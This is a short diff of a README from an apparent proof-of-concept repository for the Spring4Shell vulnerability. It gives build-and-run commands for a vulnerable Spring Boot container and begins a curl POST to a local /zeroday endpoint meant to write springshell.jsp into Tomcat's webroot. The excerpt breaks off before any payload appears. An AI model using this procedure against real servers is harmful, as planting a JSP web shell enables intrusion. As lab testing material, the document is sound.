anair-it/springshell-vuln-POC/springshell-boot-zeroday/README.md

     - Create a container from the image
       `mvn clean package && docker build . -t springshell && docker run --name springshell --rm -p 8080:8080 springshell`
 2. Run curl command that attempts to create a jsp file in the tomcat webapps/ROOT folder.
 The jsp name is springshell.jsp
-    1. If the jsp is not created, there is no vulnerability
+    1. If the jsp is not created, _the application is not compromised_
 ```
 curl --request POST \
   --url http://localhost:8080/zeroday \